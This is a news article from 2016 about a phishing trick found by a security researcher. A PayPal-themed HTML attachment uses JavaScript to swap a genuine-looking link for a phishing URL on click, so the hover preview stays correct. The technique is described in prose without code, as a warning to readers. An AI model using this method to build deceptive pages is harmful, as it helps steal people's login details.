Phishers are now showing you the correct links in the browser link preview tooltip, but redirecting you to the wrong URL

Jun 15, 2016 21:20 GMT  ·  By

Hovering links to see their true location may be a useless security tip in the near future if phishers get smart about their mode of operation and follow the example of a crook who recently managed to bypass this browser built-in security feature.

Usually, phishing emails contain links that redirect users to Web pages crafted to look like the real service they're imitating.

Users have always been instructed to hover links in the emails they receive or the buttons on a suspicious page to detect if any of them lead back to a trusted domain or just a look-alike URL.

New phishing trick uses JavaScript to hijack the user's clicked links

A UK-based security researcher known as @dvk01uk, owner of the My Online Security blog, has come across a new phishing trick.

He says he spotted a phishing email that contained an HTML page attachment. When he opened the page in his browser, the page loaded using a local client-side URL, but this wasn't what caught his eye.

Hovering the "Submit" button showed an authentic PayPal URL, which made no sense. Why would a phisher go through all this effort to deliver a non-functional page that delivered phished credentials to the real PayPal website?

He found his answer in the JavaScript files loaded by this phishing email, which contained code that hijacked user clicks.

The malicious JS code was set to replace any requests to paypal.com with the malicious phishing URL, right after the user clicked the link. Hovering the URL would not do anything, and the browser showed the correct PayPal link.

Close, but no cigar

The attacker's only mistake was to provide this HTML file as a downloadable page, something that should ring thousands of alarm bells with any user, since Web services never provide you with a copy of their Web pages, but ask you to visit their sites.

"Now if the phishers were intelligent enough to put this on a website with a half believable URL, something like http://paypalnew.com which was used in a series of Phishing attacks yesterday, we would be in trouble, because users wouldn’t realise that they were giving their details to a phisher," My Online Security writes.

Unfortunately, if you can't read JavaScript code, you will have a hard time recognizing this phishing trick if it ever gets implemented by a more apt cyber-crook.

Below is an image of the phishing page that opened in the user's browser from a local URL. Notice the address bar URL.

Phishing email, provided as a downloadable email attachment
Phishing email, provided as a downloadable email attachment

Photo Gallery (2 Images)

Submit button leads back to PayPal URL, when hovering
Phishing email, provided as a downloadable email attachment
Open gallery